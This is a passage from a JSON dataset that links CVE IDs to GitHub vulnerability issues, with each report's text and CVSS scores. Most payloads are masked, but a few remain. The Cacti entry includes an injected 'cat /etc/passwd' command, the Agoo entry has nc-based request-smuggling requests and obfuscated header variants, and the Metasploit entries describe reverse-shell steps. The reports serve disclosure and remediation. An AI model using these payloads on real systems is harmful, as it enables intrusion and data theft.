        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7219",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/7159",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/7159",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2020-01-28T23:54:20Z",
        "description": "Reserved Issue Number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7226",
        "Issue_Url_old": "https://github.com/vt-middleware/cryptacular/issues/52",
        "Issue_Url_new": "https://github.com/vt-middleware/cryptacular/issues/52",
        "Repo_new": "vt-middleware/cryptacular",
        "Issue_Created_At": "2020-01-19T15:37:20Z",
        "description": "Denial of Service in latest version NUMBERTAG Please confirm if it is a serurity vulnerability. Mitre id: CVETAG Reporter: findneo > APITAG description] > APITAG in > Cryptacular NUMBERTAG as used in Apereo CAS and other products, allows > attackers to trigger excessive memory allocation during a decode > operation, because the nonce array length associated with \"new byte\" may > depend on untrusted input within the header of encoded data. > > > > APITAG Information] > any encoded network communication based on > APITAG APITAG is affected. xxx of > new byte[xxx] can be controlled by client and can be up to NUMBERTAG ffffffd > ,which caused NUMBERTAG G of memory consuming without demanding for any > privilege. > > one of the products using this vuln code is APITAG > login flow of cas NUMBERTAG based on > APITAG APITAG APITAG > speaking,the affected code is > APITAG decode > > besides,codebase for cas NUMBERTAG is URLTAG > > > > APITAG Other] > Denial of Service > > > > APITAG of Product] > FILETAG > > > > APITAG Product Code Base] > cryptacular NUMBERTAG APITAG Component] > APITAG APITAG , > URLTAG > > > > APITAG Type] > Remote > > > > APITAG Denial of Service] > true > > > > APITAG Vectors] > a crafted header of encoded data. > e.g PATHTAG >",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7229",
        "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/7",
        "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/7",
        "Repo_new": "niteosoft/simplejobscript",
        "Issue_Created_At": "2020-01-10T14:55:41Z",
        "description": "SQL injection in search function. Description: APITAG is vulnerable to SQL injection in the search function. Environment: Version NUMBERTAG OS: Ubuntu NUMBERTAG Web server: Apache NUMBERTAG PHP NUMBERTAG Database: APITAG NUMBERTAG URL: /searched Payload: APITAG Steps to Reproduce: CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7237",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3201",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3201",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-01-19T06:04:29Z",
        "description": "Vulnerability Report: Remote Code Execution due to input validation in Performance Boost Debug Log. Describe the bug An input validation error found in Boost Debug Log field leads to Remote Code Execution. To Reproduce Steps to reproduce the behavior NUMBERTAG Navigate to Console > Configuration > Settings > Performance NUMBERTAG In Boost Debug Log field, type in the payload: APITAG NUMBERTAG Save. Even the $input_whitelisting in FILETAG is ON, it would still accept this payload NUMBERTAG Wait a little bit until new polling cycle gets fetched. Navigate to APITAG to see /etc/passwd content. Screenshots Payload FILETAG Successfully saved the payload FILETAG /etc/passwd content FILETAG Root cause Not like other fields in Configuration tab, Boost Debug Log would still be saved even if the input contains special characters. Tracing back to server log, I observed that this is being handled by FILETAG where it gets fetched by the poller process. Taking a look at the FILETAG , I observed that there are NUMBERTAG different arguments that can be used to passed into its command. Hence, we can use either debug, force, verbose, version, or help to pass into Boost Debug Log field. After crafting a payload, the script will look like: /bin/php FILETAG verbose; cat /etc/passswd > FILETAG where it gets fetched by the new poller process and create FILETAG in webroot. Remediation Apply a check on this field (i.e: input length, input characters) If this field is supposed to take these mentioned arguments, create a drop down menu instead of string field if possible. Please let me know if you need any further information. Chi Tran",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7238",
        "Issue_Url_old": "https://github.com/jdordonezn/CVE-2020-72381/issues/1",
        "Issue_Url_new": "https://github.com/jdordonezn/cve-2020-72381/issues/1",
        "Repo_new": "jdordonezn/cve-2020-72381",
        "Issue_Created_At": "2020-01-26T19:58:20Z",
        "description": "HTTP Request Smuggling in Netty APITAG Netty APITAG allows HTTP Request Smuggling because it mishandles Transfer Encoding whitespace (such as a FILETAG Normal request FILETAG Processing of netty FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7350",
        "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/13026",
        "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/13026",
        "Repo_new": "rapid7/metasploit-framework",
        "Issue_Created_At": "2020-03-04T17:31:41Z",
        "description": "possible vulnerability in libnotify. the plugin libnotify has a command injection vulnerability which could be triggered when the client imports info as hostnames or services specially crafted from another tool The impact is low because is not possible to tamper the hostname when the client runs a scan with nmap for example in the libnotify's callback of db_host: APITAG if we could tamper the field os_name, this data lands in a call to system in notify send in order to display the notification APITAG Steps to reproduce How'd you do it NUMBERTAG load the plugin: APITAG NUMBERTAG Now if we import the hosts' info from another tool (as faraday, openvas or nessus) and we don't have limitations in the hostname field, the importer plugin will run our field without sanitizing the plugin will run something similar to: CODETAG in this case, I made a little APITAG running a reverse shell in another port the impact is really low because tools as nmap filter the hostname based on the fingerprint of the OS so is not easy to trigger the bug in a scan for example, but in a plugin importer could be fit",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-7376",
        "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/14008",
        "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/14008",
        "Repo_new": "rapid7/metasploit-framework",
        "Issue_Created_At": "2020-08-17T10:00:48Z",
        "description": "PATHTAG permits remote command execution on Metasploit host. On the victim soon to be attacker host create some fun executables : ERRORTAG CODETAG On the attacker soon to be the victim host start a multi handler like any other day: ERRORTAG On the victim soon to be attacker host give the \"attacker\" a shell in a root user namespace: ERRORTAG On the attacker soon to be the victim host enjoy the new shell and enumerate some host info with APITAG (also check there's no funny cron jobs or anything listening on APITAG , because that would be bad) : ERRORTAG On the victim soon to be the attacker host: CODETAG After patch NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7377",
        "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/14015",
        "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/14015",
        "Repo_new": "rapid7/metasploit-framework",
        "Issue_Created_At": "2020-08-18T08:48:55Z",
        "description": "PATHTAG ERRORTAG method is vulnerable to directory traversal resulting in arbitrary file write on the Metasploit host. The ERRORTAG method in the APITAG module is vulnerable to directory traversal resulting in arbitrary file write. This can be used to achieve remote command execution on the Metasploit host from a remote malicious webserver masquerading as a Telpho NUMBERTAG system. Vulnerable Code ERRORTAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7661",
        "Issue_Url_old": "https://github.com/kevva/url-regex/issues/70",
        "Issue_Url_new": "https://github.com/kevva/url-regex/issues/70",
        "Repo_new": "kevva/url-regex",
        "Issue_Created_At": "2020-04-26T22:13:22Z",
        "description": "CORE BUG + SECURITY VULNERABILITY Parsing a long String will result in NUMBERTAG CPU usage and APITAG will never finish. Example: `sh > require('url regex')({ strict: false APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7670",
        "Issue_Url_old": "https://github.com/ohler55/agoo/issues/88",
        "Issue_Url_new": "https://github.com/ohler55/agoo/issues/88",
        "Repo_new": "ohler55/agoo",
        "Issue_Created_At": "2020-05-16T00:01:28Z",
        "description": "Protect agains smuggling attacks. Testbed used to verify the vulnerability: URLTAG The following requests can be send via command line (tested on ubuntu) to reproduce the behaviour Double Content Length Headers printf 'GET /hello HTTP NUMBERTAG APITAG Length NUMBERTAG APITAG Length NUMBERTAG APITAG APITAG '\\ ' '\\ 'GET /smuggle HTTP NUMBERTAG APITAG APITAG '\\ ' ' | nc APITAG NUMBERTAG Invalid Transfer Encoding Header printf 'POST / HTTP NUMBERTAG APITAG '\\ APITAG ENCODING: chunked '\\ APITAG Type: application/x www form urlencoded NUMBERTAG nc APITAG NUMBERTAG Agoo allows multiple malformed variations of the Transfer Encoding header A request with Content Length and malformed Transfer encoding headers that can be sent to a backend server and conduct CL:TE attacks. ( URLTAG POST /hello HTTP NUMBERTAG Host: APITAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Transfer Encoding : chunked NUMBERTAG In the above example, the request is sent with the Transfer encoding header having extra spaces APITAG Encoding : chunked). This is in violation of RFC NUMBERTAG Agoo was also found to allow multiple variations of bad transfer encoding headers including CRLF characters, Fake Transfer encoding etc. APITAG TE.TE behavior: obfuscating the TE header section: URLTAG Some other examples that is allowed: Transfer Encoding: chunk Transfer Encoding: ch\u2013nked Transfer Encoding:\u00ffchunked Transfer Encoding:chunked tRANSFER ENCODING: chunked [space APITAG Encoding: chunked Transfer Encoding: chunked Transfer Encoding:chunked Transfer Encoding: \"chunked\" Transfer Encoding : chunked Transfer Encoding: chunked The above is proof of concept which just demonstrates the behaviour. Depending on how Algoo will be used as part of a chain of servers, this could result in a successful request smuggling attack. I am happy to provide more information regarding a successful attack. Remediation The best solution to remediate this vulnerability is to do the following: Disallow requests with double content lengths headers Ensure malformed Transfer encoding headers are not allowed. This can be done via rejecting the request and sending a NUMBERTAG back to the HTTP client As per RFC NUMBERTAG FILETAG When requests with both Content Length and Transfer encoding header is sent, the Content Length header should be ignored Remediation for the following open source projects can be used as a reference. The above points were taken from that. \u2022 URLTAG \u2022 URLTAG \u2022 URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7671",
        "Issue_Url_old": "https://github.com/postrank-labs/goliath/issues/351",
        "Issue_Url_new": "https://github.com/postrank-labs/goliath/issues/351",
        "Repo_new": "postrank-labs/goliath",
        "Issue_Created_At": "2020-06-02T19:56:15Z",
        "description": "HTTP Request Smuggling Hardening. Posting it here for community patches after talking with the maintainers privately. Issue: Goliath doesn't prevent Request Smuggling attacks NUMBERTAG Goliath allows requests with multiple content lengths. When sent a request such as the below, the first content length header is ignored and the second content length header is prioritized. Since the second content length was set to zero, the backend will expect no request body and the /smuggledreq request is treated as another pipelined request. APITAG CODETAG NUMBERTAG Goliath allows multiple malformed variations of the Transfer Encoding header. Depending on how Goliath will be used as part of a chain of servers, this could result in a successful request smuggling attack. ERRORTAG Other examples: ERRORTAG How to fix: Prioritize Transfer Encoding over Content Length Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: When a request with both a Transfer Encoding: chunked header and Content length is received, the transfer encoding header should be prioritized over Content Length. This is referenced in RFC NUMBERTAG Section NUMBERTAG Disallow requests with Double Content Length Remediation: This remediation will prevent CL:CL attacks Details: As mentioned in RFC NUMBERTAG Section NUMBERTAG if a HTTP request is received with multiple content length headers with different length values, this should be responded with a HTTP NUMBERTAG response. Disallow malformed Transfer encoding headers Remediation: This remediation will prevent TE:TE attacks. Details: If both a frontend and backend prioritizes the Transfer Encoding header, it could allow smuggling attacks where an attacker inserts two Transfer Encoding headers, one which would be ignored by the frontend and is processed by the backend and vice versa. As such, the following type of header variations should be rejected. More examples of header variations can be seen here: URLTAG Disallow requests with both Content length and Transfer encoding Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: This can be seen as a better alternative to APITAG Transfer Encoding over Content Length\u201d solution. Runtime platforms such as FILETAG have used this solution to remediate against request smuggling where any requests with both headers are returned with a HTTP NUMBERTAG response.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7680",
        "Issue_Url_old": "https://github.com/docsifyjs/docsify/issues/1126",
        "Issue_Url_new": "https://github.com/docsifyjs/docsify/issues/1126",
        "Repo_new": "docsifyjs/docsify",
        "Issue_Created_At": "2020-04-19T19:19:47Z",
        "description": "vulnerability report. APITAG APITAG APITAG APITAG APITAG Bug Report I have found a security vulnerability in docsify.sj. How would you like me to report it? Steps to reproduce What is current behaviour What is the expected behaviour Other relevant information APITAG [ ] Bug does still occur when all/other plugins are disabled? Your OS: FILETAG version: npm/yarn version: Browser version: Docsify version: Docsify plugins: APITAG Please create a reproducible sandbox APITAG NUMBERTAG qq NUMBERTAG URLTAG Mention the docsify version in which this bug was not present (if any)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7689",
        "Issue_Url_old": "https://github.com/kelektiv/node.bcrypt.js/issues/776",
        "Issue_Url_new": "https://github.com/kelektiv/node.bcrypt.js/issues/776",
        "Repo_new": "kelektiv/node.bcrypt.js",
        "Issue_Created_At": "2020-01-25T13:41:58Z",
        "description": "Some compatibility issue with emoji. When using NUMBERTAG emoji compatibility between bcrypt APITAG php and bcrypt APITAG bcryptjs is broken, whereas bcryptjs APITAG php is fine. Code to represent the issue. CODETAG The output: CODETAG Fedora NUMBERTAG bcrypt NUMBERTAG node APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7690",
        "Issue_Url_old": "https://github.com/MrRio/jsPDF/issues/2795",
        "Issue_Url_new": "https://github.com/parallax/jspdf/issues/2795",
        "Repo_new": "parallax/jspdf",
        "Issue_Created_At": "2020-07-02T15:07:14Z",
        "description": "XSS vulnerability in html method. When using the html method, it is possible to inject code that is executed in the user context. E.g. like this: ERRORTAG E.g., this line seems to be suspicious: URLTAG We need to analyze how to fix this and if there is other vulnerable code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7692",
        "Issue_Url_old": "https://github.com/googleapis/google-oauth-java-client/issues/469",
        "Issue_Url_new": "https://github.com/googleapis/google-oauth-java-client/issues/469",
        "Repo_new": "googleapis/google-oauth-java-client",
        "Issue_Created_At": "2020-05-26T17:52:41Z",
        "description": "PKCE support?. I've been looking for information about how to enable PKCE when using the APITAG but haven't found anything. Am I missing something or is PKCE not supported (out of the box) by this library?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7693",
        "Issue_Url_old": "https://github.com/sockjs/sockjs-node/issues/252",
        "Issue_Url_new": "https://github.com/sockjs/sockjs-node/issues/252",
        "Repo_new": "sockjs/sockjs-node",
        "Issue_Created_At": "2019-02-11T10:19:37Z",
        "description": "ERR_STREAM_WRITE_AFTER_END when issuing upgrade request on non existent URL. On version NUMBERTAG and I believe in NUMBERTAG also), when issuing upgrade request on wrong URL i.e. APITAG , APITAG calls APITAG in a APITAG block and then APITAG is being called for the second time in ERRORTAG method which throws...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7696",
        "Issue_Url_old": "https://github.com/DylanVann/react-native-fast-image/issues/690",
        "Issue_Url_new": "https://github.com/dylanvann/react-native-fast-image/issues/690",
        "Repo_new": "dylanvann/react-native-fast-image",
        "Issue_Created_At": "2020-06-05T09:52:30Z",
        "description": "APITAG Headers for one request are sent for all subsequent requests, even if no headers specified. Describe the bug When an image with APITAG is loaded, all other subsequent images will use the same headers. This can lead to images not showing, because the host header is wrong, and web servers will return ERRORTAG errors for the request. To Reproduce Steps to reproduce the behavior if possible, or a link to a reproduction repo NUMBERTAG Go to FILETAG and create a new endpoint NUMBERTAG Add an image with APITAG NUMBERTAG Create another endpoint at hookbin NUMBERTAG Add another image with APITAG , ensure it loads after image NUMBERTAG The request for image on endpoint NUMBERTAG will include the foo : bar headers. This is probably the reason of a lot of errors with images not properly showing in this repository. Additionally, this is a serious security issue, as signing credentials or other session tokens could be leaked to other servers. See screenshot below. Expected behavior Headers should not be reused. Screenshots Will add soon Dependency versions React Native version NUMBERTAG React version NUMBERTAG React Native Fast Image version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7699",
        "Issue_Url_old": "https://github.com/richardgirges/express-fileupload/issues/236",
        "Issue_Url_new": "https://github.com/richardgirges/express-fileupload/issues/236",
        "Repo_new": "richardgirges/express-fileupload",
        "Issue_Created_At": "2020-07-29T02:48:39Z",
        "description": "Prototype Pollution. This module has prototype pollution vulnerablity and it can make DOS with APITAG option. server CODETAG exploit APITAG raw packet ERRORTAG Full description is in here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7710",
        "Issue_Url_old": "https://github.com/hacksparrow/safe-eval/issues/19",
        "Issue_Url_new": "https://github.com/hacksparrow/safe-eval/issues/19",
        "Repo_new": "hacksparrow/safe-eval",
        "Issue_Created_At": "2020-02-28T07:50:28Z",
        "description": "Sandbox Escape. The following script can lead to safe eval sandbox escape (node APITAG ): ERRORTAG Inspired from MENTIONTAG 's vm2 escape URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7711",
        "Issue_Url_old": "https://github.com/russellhaering/goxmldsig/issues/48",
        "Issue_Url_new": "https://github.com/russellhaering/goxmldsig/issues/48",
        "Repo_new": "russellhaering/goxmldsig",
        "Issue_Created_At": "2019-08-14T10:53:49Z",
        "description": "Crash on nil pointer dereference with malformed input. See URLTAG for background. Program which exhibits the issue: ERRORTAG Panic: ERRORTAG Potential fix: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7711",
        "Issue_Url_old": "https://github.com/russellhaering/gosaml2/issues/59",
        "Issue_Url_new": "https://github.com/russellhaering/gosaml2/issues/59",
        "Repo_new": "russellhaering/gosaml2",
        "Issue_Created_At": "2019-08-14T10:45:18Z",
        "description": "Crash on nil pointer dereference with malformed input. I've been doing a bit of fuzzing of this package with go fuzz. I captured a valid SAML response from Okta and then had go fuzz mutate it. I have fuzzing implemented on this branch URLTAG Here's the panic in a simple test program: ERRORTAG ERRORTAG Appears to be unverified assertions can have nil parents. Appears to be fixed with this patch: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7712",
        "Issue_Url_old": "https://github.com/trentm/json/issues/144",
        "Issue_Url_new": "https://github.com/trentm/json/issues/144",
        "Repo_new": "trentm/json",
        "Issue_Created_At": "2020-08-06T07:10:51Z",
        "description": "Command Injection. POC CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-7755",
        "Issue_Url_old": "https://github.com/dataarts/dat.gui/issues/278",
        "Issue_Url_new": "https://github.com/dataarts/dat.gui/issues/278",
        "Repo_new": "dataarts/dat.gui",
        "Issue_Created_At": "2020-10-06T14:39:08Z",
        "description": "Regular Expression Denial of Service APITAG in APITAG Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG URLTAG The APITAG vulnerability of the regex is mainly due to the sub pattern APITAG and can be exploited with the following string APITAG You can execute the following code to reproduce APITAG ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7774",
        "Issue_Url_old": "https://github.com/yargs/y18n/issues/96",
        "Issue_Url_new": "https://github.com/yargs/y18n/issues/96",
        "Repo_new": "yargs/y18n",
        "Issue_Created_At": "2020-08-06T01:23:11Z",
        "description": "Prototype pollution. POC APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7780",
        "Issue_Url_old": "https://github.com/softwaremill/akka-http-session/issues/74",
        "Issue_Url_new": "https://github.com/softwaremill/akka-http-session/issues/74",
        "Repo_new": "softwaremill/akka-http-session",
        "Issue_Created_At": "2020-03-10T13:22:17Z",
        "description": "CSRF protection can be bypassed with empty header and empty cookie. Hi, During the penetration test of our system which is happily using akka http session the testers found out that it's possible to bypass the csrf protection. When you send a POST to an endpoint protected by APITAG and pass in an empty X XSRF TOKEN header and a XSRF TOKEN cookie with empty value, the filter will let you pass. I think is due to the check in APITAG on line NUMBERTAG if (submitted == cookie) { pass } but the value itself is not inspected and could possibly be empty. Hope this can be fixed, thanks, Willem",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-7790",
        "Issue_Url_old": "https://github.com/spatie/browsershot/issues/441",
        "Issue_Url_new": "https://github.com/spatie/browsershot/issues/441",
        "Repo_new": "spatie/browsershot",
        "Issue_Created_At": "2020-11-03T06:15:46Z",
        "description": "Issue with usage of file protocol scheme. This library is creating temporary files and loading them up with PATHTAG protocol scheme URLTAG url when APITAG function is used. Using a file protocol scheme along with headless browser such as Chrome on a server side is not a good idea and will lead to Local file disclosure APITAG Vulnerability). Other local files present on the server could be loaded when a malicious HTML is provided. Local files can be loaded either with APITAG (e.g. APITAG ) or by setting the different document location. Also, it is unlikely for the developers to check each and every page for malicious APITAG inputs. This vulnerability can be verified by using below snippet CODETAG I see it can be fixed either in the PHP code or in the JS code. I believe this small JS snippet can be added at URLTAG url to make it secure. Below code can be added to library which validates the file protocol scheme and use the APITAG puppeteer function which loads in 'about:blank' page and does not cause any harm even if malicious APITAG inputs are provided. ERRORTAG I am not sure about the performance impact this additional code will create. Let me know your comments",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7791",
        "Issue_Url_old": "https://github.com/turquoiseowl/i18n/issues/387",
        "Issue_Url_new": "https://github.com/turquoiseowl/i18n/issues/387",
        "Repo_new": "turquoiseowl/i18n",
        "Issue_Created_At": "2019-08-13T11:07:02Z",
        "description": "Security vulnerability crashes app pool. MENTIONTAG During some penetration testing of our application, the testers have found a security vulnerability in the i NUMBERTAG n library that potentially crashes the app pool. I have a fix, but not the contribution rights and presumably its not a great idea to describe the issue in too much detail in public lest somebody decides to hijack this vulnerability.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7955",
        "Issue_Url_old": "https://github.com/hashicorp/consul/issues/7160",
        "Issue_Url_new": "https://github.com/hashicorp/consul/issues/7160",
        "Repo_new": "hashicorp/consul",
        "Issue_Created_At": "2020-01-28T23:54:33Z",
        "description": "Reserved Issue Number.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-7956",
        "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7003",
        "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7003",
        "Repo_new": "hashicorp/nomad",
        "Issue_Created_At": "2020-01-28T19:12:39Z",
        "description": "Reserved Issue Number. TBD",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8089",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1150",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1150",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2020-01-20T13:47:13Z",
        "description": "Stored Cross Site Scripting vulnerability in Piwigo CMS. Description: Piwigo version NUMBERTAG is affected by stored cross site scripting vulnerability. This vulnerability exists in APITAG Name\" Field in \"group_list\" page. How to reproduce NUMBERTAG Login into the application NUMBERTAG Go to the APITAG > APITAG page from life navigation menu NUMBERTAG Click on APITAG Group\" button and then in APITAG Name\" field insert the payload APITAG and hit add button. CVSS Score: PATHTAG POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Origin: FILETAG Connection: close Cookie: APITAG phavsz NUMBERTAG APITAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-8112",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1231",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1231",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2020-01-28T11:05:53Z",
        "description": "Another heap buffer overflow in libopenjp2. Hi, This overflow looks similar to NUMBERTAG but still works on latest master APITAG ERRORTAG Steps to reproduce as in NUMBERTAG the crashing input is available here PATHTAG . Thank you!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
